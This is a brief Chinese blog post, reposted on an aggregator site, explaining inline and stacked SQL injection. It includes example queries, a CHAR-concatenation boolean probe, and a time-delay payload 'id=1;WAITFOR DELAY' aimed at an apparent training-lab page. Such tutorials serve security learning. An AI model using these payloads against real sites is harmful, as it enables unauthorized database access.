首页 > 其他 > 详细

内联注入和堆叠注入

时间:2019-10-31 01:17:19      阅读:492      评论:0      收藏:0      [点我收藏+]

一、内联注入

  select id from (select 1 as id)a;

技术分享图片

   select * from T1,T3 where T1.userid=T3.userid;

   select * from admin,news where admin.uid=news.tid;

技术分享图片

   select * from admin where uid = 1 and (SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))

技术分享图片

 二、堆叠注入

  堆叠恶意sql语句,威胁度极高。

  select * from news;select 1,2,3,4,user(),version();

  payload:id=1;WAITFOR DELAY ‘0:0:5‘--

  http://……/less-2.asp?id=1;WAITFOR DELAY ‘0:0:5‘--

技术分享图片

 技术分享图片

 

内联注入和堆叠注入

原文:https://www.cnblogs.com/yuanshu/p/11765240.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!